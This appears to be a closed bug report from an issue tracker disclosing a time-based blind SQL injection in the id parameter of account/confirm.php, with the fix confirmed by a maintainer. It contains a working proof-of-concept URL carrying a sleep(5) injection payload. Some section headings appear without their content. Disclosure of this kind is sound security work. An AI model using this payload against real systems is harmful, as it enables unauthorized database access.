Closed wanan0red closed 1 year ago
poc
http://stu/account/confirm.php?id=12345678901234567890123456789012'+or+sleep(5)%23
final sql statement
Repair plan
framework/Accounts.php#userIdFromConfirmcode()
Thank you very much for reporting the issue and providing a fix. Confirmed and fixed with 69736d3d55c9171dca21412480aa2e4f11b4bf62
SQL injection account/confirm.php id parameter exists time blind injection
poc
final sql statement
Repair plan
framework/Accounts.php#userIdFromConfirmcode()